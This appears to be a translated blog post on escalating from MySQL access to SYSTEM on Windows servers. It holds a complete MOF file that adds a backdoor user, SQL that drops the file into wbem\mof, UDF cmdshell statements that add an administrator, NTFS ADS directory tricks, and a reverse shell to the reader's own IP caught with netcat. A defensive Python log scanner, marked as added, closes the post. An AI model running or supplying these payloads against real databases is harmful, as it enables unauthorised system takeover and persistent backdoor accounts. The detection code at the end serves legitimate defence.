Summary of MySQL Privilege Escalation

Source: Internet
Author: User

Recently, while testing a project, I came across a MySQL database and tried to escalate privileges through it, but in the end I did not succeed. That was frustrating; probably because I had not looked at privilege escalation for a long time, my skills had slipped, so I have summarised the various MySQL privilege-escalation techniques here for review. There are only a few ways to escalate privileges through MySQL, and I hope this helps.

I. Privilege escalation via MOF

A while ago Kingcope released a MySQL remote privilege-escalation 0day (MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day), and the blogger Jianxin (剑心) analysed the MOF technique it uses, as follows:

Windows Management Instrumentation (WMI) provides the following three ways to compile Managed Object Format (MOF) files into the WMI repository:

Method 1: Run Mofcomp.exe with the MOF file as the command-line parameter.

Method 2: Use the IMofCompiler interface and its CompileFile method.

Method 3: Drop the MOF file into the %systemroot%\system32\wbem\mof folder.

Microsoft recommends compiling MOF files into the repository using the first two methods, that is, running Mofcomp.exe or calling IMofCompiler::CompileFile.

The third method is provided only for backward compatibility with earlier versions of WMI and should not be used, since the feature may be removed in a future release.

So how do we apply this specifically to MySQL privilege escalation?

1. Find a writable directory and upload the MOF file. Here I uploaded it as C:/wmpub/nullevt.mof; its contents are as follows.

#pragma namespace("\\\\.\\root\\subscription")

instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name  = "filtP2";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};

instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText =
    "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user waitalone waitalone.cn /add\")";
};

instance of __FilterToConsumerBinding
{
    Consumer   = $Consumer;
    Filter = $EventFilter;
};

The command on line 18 (the net.exe command inside ScriptText) is the one to change to your own before uploading.

2. Use load_file() together with INTO DUMPFILE to write the file to the right location.

select load_file('C:/wmpub/nullevt.mof') into dumpfile 'C:/windows/system32/wbem/mof/nullevt.mof';

After the statement executes successfully, an ordinary user is added. You can then change the command in the MOF file and run the same steps again to elevate that user to the administrators group, after which a 3389 (RDP) connection works.

II. Privilege escalation via UDF

UDF privilege escalation is the most common technique, but it frequently fails with "Can't open shared library". We can use NTFS ADS (alternate data streams) to get around this problem.

1. The most common way is to use a tool such as udf.php directly, as follows.

After connecting to MySQL, export udf.dll into the C:\Windows\System32 directory.

2. Create the function and execute commands with it, as follows:

create function cmdshell returns string soname 'udf.dll';
select cmdshell('net user waitalone waitalone.cn /add');
select cmdshell('net localgroup administrators waitalone /add');
drop function cmdshell;                              -- remove the function
delete from mysql.func where name = 'cmdshell';      -- delete the function entry

3. In some cases we still hit "Can't open shared library" and need to export udf.dll into the lib\plugin directory, but by default the plugin directory does not exist. What then? Fortunately someone worked out a method for creating folders using NTFS ADS streams:

select @@basedir;   -- find the MySQL install directory
select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib::$INDEX_ALLOCATION';          -- create the lib directory via NTFS ADS
select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin::$INDEX_ALLOCATION';  -- create the plugin directory via NTFS ADS

Once these execute successfully, export udf.dll into the plugin directory as before.

III. Privilege escalation via a reverse-connect port

If we scan a host with a weak MySQL root password and can connect, but cannot get a shell on the website hosted on the server, what do we do?

1. Connect to the MySQL server with the MySQL client tool and run the following.

mysql.exe -h 172.16.10.11 -uroot -p
Enter password:
mysql> \. C:\mysql.txt
mysql> select backshell("yourip", 2010);

2. Listen locally on your reverse-connect port:

nc.exe -vv -l -p 2010

On success you get a cmd shell with SYSTEM privileges; in fact this is also UDF privilege escalation underneath.
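As an added defensive example (not from the original post), the following Python scanner flags, in a MySQL general log, the statements used by all three techniques above: INTO DUMPFILE writes into the wbem\mof directory, NTFS ADS directory creation, DLL drops into lib\plugin, and CREATE FUNCTION ... SONAME. The signature names and the sample log lines are constructed assumptions.

```python
import re

# Signatures for the three escalation techniques discussed above (assumed
# shapes of an attempt, not an exhaustive list).
SIGNATURES = {
    "mof_drop_into_wbem":   re.compile(r"into\s+dumpfile\s+'[^']*wbem[\\/]+mof[\\/]", re.I),
    "udf_create_function":  re.compile(r"create\s+function\s+\w+\s+returns\s+\w+\s+soname", re.I),
    "ads_directory_create": re.compile(r"into\s+dumpfile\s+'[^']*::\$INDEX_ALLOCATION'", re.I),
    "dll_into_plugin_dir":  re.compile(r"into\s+dumpfile\s+'[^']*lib[\\/]+plugin[\\/][^']*\.dll'", re.I),
}

def classify_statement(sql):
    """Return the names of every signature the statement matches (empty if benign)."""
    return [name for name, rx in SIGNATURES.items() if rx.search(sql)]

def parse_general_log_line(line):
    """Split a general-log line "<time>\t<thread_id> <command>\t<argument>".

    Returns (time, thread_id, command, argument), or None for lines that do
    not have this shape (e.g. wrapped continuation lines)."""
    parts = line.rstrip("\n").split("\t", 2)
    if len(parts) != 3:
        return None
    head = parts[1].split()
    if len(head) != 2 or not head[0].isdigit():
        return None
    return parts[0], int(head[0]), head[1], parts[2]

def scan_general_log(lines):
    """Return (thread_id, matched_signatures, statement) for each suspicious Query."""
    alerts = []
    for line in lines:
        parsed = parse_general_log_line(line)
        if parsed is None or parsed[2] != "Query":
            continue
        hits = classify_statement(parsed[3])
        if hits:
            alerts.append((parsed[1], hits, parsed[3]))
    return alerts

# Constructed sample log (not a real capture) in MySQL general-log format.
SAMPLE_LOG = [
    "130101 12:00:01\t    7 Connect\troot@172.16.10.50 on ",
    "130101 12:00:02\t    7 Query\tselect @@basedir",
    "130101 12:00:03\t    7 Query\tselect 'It is dll' into dumpfile 'C:\\\\Program Files\\\\MySQL\\\\MySQL Server 5.1\\\\lib\\\\plugin::$INDEX_ALLOCATION'",
    "130101 12:00:04\t    7 Query\tselect load_file('C:/wmpub/nullevt.mof') into dumpfile 'C:/windows/system32/wbem/mof/nullevt.mof'",
    "130101 12:00:05\t    7 Query\tcreate function cmdshell returns string soname 'udf.dll'",
    "130101 12:00:06\t    8 Query\tselect id, name from customers where id = 42",
]

if __name__ == "__main__":
    for thread_id, hits, sql in scan_general_log(SAMPLE_LOG):
        print(f"thread {thread_id}: {', '.join(hits)} :: {sql}")
```

The matching mitigations are to enable the general log so these statements are recorded at all, and to set secure_file_priv so INTO DUMPFILE and LOAD_FILE() are confined to one directory.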
